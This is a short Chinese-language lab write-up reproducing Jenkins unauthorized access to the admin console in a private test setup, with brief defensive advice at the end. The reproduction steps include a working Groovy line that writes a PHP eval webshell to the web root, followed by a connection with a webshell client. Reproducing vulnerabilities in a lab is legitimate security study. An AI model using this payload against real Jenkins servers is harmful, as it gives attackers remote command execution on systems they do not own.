jenkins未授权访问漏洞
一、漏洞描述
未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。
二、漏洞环境搭建
1、官方下载jenkins-1.620-1.1.noarch.rpm,下载地址:http://mirrors.jenkins.io
2、在redhat安装jenkins
rpm -ivh jenkins-1.620-1.1.noarch.rpm
3、开启jenkins服务
4、浏览器访问http://192.168.10.137:8080,如下图所示说明环境搭建成功
三、漏洞复现
1、浏览器访问http://192.168.10.137:8080/manage,可以看到没有做任何限制,可以直接访问
2、点击”脚本命令行”
3、执行系统命令,下图看到成功执行系统命令
4、利用”脚本命令行”上传webshell,内容如下:
new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');
5、点击“运行”,没有报错,上传成功
6、菜刀连接
四、漏洞防御
1、对后台控制页面做登录验证限制
2、升级版本